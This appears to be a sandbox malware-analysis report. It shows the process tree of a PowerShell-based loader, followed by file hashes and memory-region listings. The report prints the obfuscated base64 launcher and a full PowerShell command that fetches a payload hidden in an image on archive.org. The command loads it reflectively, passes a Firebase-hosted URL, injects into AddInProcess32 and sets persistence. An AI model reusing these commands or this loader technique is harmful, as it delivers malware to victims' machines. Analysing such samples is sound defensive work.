▷bgBk㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷bwBh㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQBk㏵ ⊷ ➟ ⇒ ▷EE㏵ ⊷ ➟ ⇒ ▷cwBz㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQBi㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷eQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷UgBl㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bg㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷EE㏵ ⊷ ➟ ⇒ ▷cwBz㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQBi㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷eQBd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBM㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷YQBk㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷B0㏵ ⊷ ➟ ⇒ ▷Hk㏵ ⊷ ➟ ⇒ ▷c㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷QQBz㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷B5㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷RwBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷B5㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bu㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷aQBi㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷SQBP㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷S㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷ZQB0㏵ ⊷ ➟ ⇒ ▷Gg㏵ ⊷ ➟ ⇒ ▷bwBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷B5㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷Ec㏵ ⊷ ➟ ⇒ ▷ZQB0㏵ ⊷ ➟ ⇒ ▷E0㏵ ⊷ ➟ ⇒ ▷ZQB0㏵ ⊷ ➟ ⇒ ▷Gg㏵ ⊷ ➟ ⇒ ▷bwBk㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷JwBW㏵ ⊷ ➟ ⇒ ▷EE㏵ ⊷ ➟ ⇒ ▷SQ㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷LgBJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷dgBv㏵ ⊷ ➟ ⇒ ▷Gs㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷bgB1㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷WwBv㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷agBl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷F0㏵ ⊷ ➟ ⇒ ▷XQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷z㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷3㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷ZQBh㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷1㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷Mw㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Dg㏵ ⊷ ➟ ⇒ ▷Mw㏵ ⊷ ➟ ⇒ ▷3㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷LQBm㏵ ⊷ ➟ ⇒ ▷DM㏵ ⊷ ➟ ⇒ ▷Yg㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷C0㏵ ⊷ ➟ ⇒ ▷MgBl㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷MQ㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZgBk㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷Zg㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZQBr㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷m㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷aQBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQ㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷D8㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷B4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷Lg㏵ ⊷ ➟ ⇒ ▷x㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷y㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Mg㏵ ⊷ ➟ ⇒ ▷4㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Ng㏵ ⊷ ➟ ⇒ ▷w㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷cgBv㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷bwBs㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷bw㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷bwBj㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷cwBw㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷YQ㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷Mg㏵ ⊷ ➟ ⇒ ▷w㏵ ⊷ ➟ ⇒ ▷DI㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷eQBy㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷LwBi㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷B2㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷bQBv㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷LgBz㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷c㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bn㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bwBn㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷ZQBn㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgBv㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷YQBi㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cgBp㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷Lw㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷cwBw㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bo㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷x㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷JwBD㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷X㏵ ⊷ ➟ ⇒ ▷BQ㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷bwBn㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷YQBt㏵ ⊷ ➟ ⇒ ▷EQ㏵ ⊷ ➟ ⇒ ▷YQB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷X㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷L㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷ZQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷YQB1㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷YQBu㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷YQ㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Cw㏵ ⊷ ➟ ⇒ ▷JwBB㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷U㏵ ⊷ ➟ ⇒ ▷By㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷YwBl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷z㏵ ⊷ ➟ ⇒ ▷DI㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷YQB0㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷dgBh㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷bw㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('㏵ ⊷ ➟ ⇒ ▷','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3256
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('34e7beafd5a3-837a-f3b4-2ee1-afdf4ecf=nekot&aidem=tla?txt.1042028060mrowxenol/o/moc.topsppa.4202stpyrc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'estauranthera','AddInProcess32','desativado'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4564
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\estauranthera.js"
          4⤵
            PID:1588
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
              PID:4672
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3316
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3316 -s 1960
                5⤵
                • Program crash
                PID:1044
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3316 -ip 3316
        1⤵
          PID:2104

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          f41839a3fe2888c8b3050197bc9a0a05

          SHA1

          0798941aaf7a53a11ea9ed589752890aee069729

          SHA256

          224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

          SHA512

          2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          d8b9a260789a22d72263ef3bb119108c

          SHA1

          376a9bd48726f422679f2cd65003442c0b6f6dd5

          SHA256

          d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

          SHA512

          550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdan0hc0.cmy.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/3256-12-0x00007FFC00D90000-0x00007FFC01851000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3256-1-0x00000162EA130000-0x00000162EA152000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3256-22-0x00007FFC00D90000-0x00007FFC01851000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3256-31-0x00007FFC00D90000-0x00007FFC01851000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3256-0-0x00007FFC00D93000-0x00007FFC00D95000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3256-11-0x00007FFC00D90000-0x00007FFC01851000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3316-25-0x0000000000400000-0x0000000000410000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3316-32-0x0000000004C70000-0x0000000004D0C000-memory.dmp

          Filesize

          624KB

          Download

        • memory/3316-33-0x00000000056A0000-0x0000000005C44000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/3316-34-0x0000000005490000-0x0000000005522000-memory.dmp

          Filesize

          584KB

          Download

        • memory/3316-35-0x0000000005450000-0x000000000545A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/3316-36-0x0000000006BB0000-0x0000000006C16000-memory.dmp

          Filesize

          408KB

          Download

        • memory/3316-37-0x0000000007590000-0x00000000076AE000-memory.dmp

          Filesize

          1.1MB

          Download

        • memory/3316-38-0x00000000076F0000-0x0000000007A44000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/3316-39-0x0000000007BE0000-0x0000000007C2C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/4564-23-0x000001C8F4DB0000-0x000001C8F4ED2000-memory.dmp

          Filesize

          1.1MB

          Download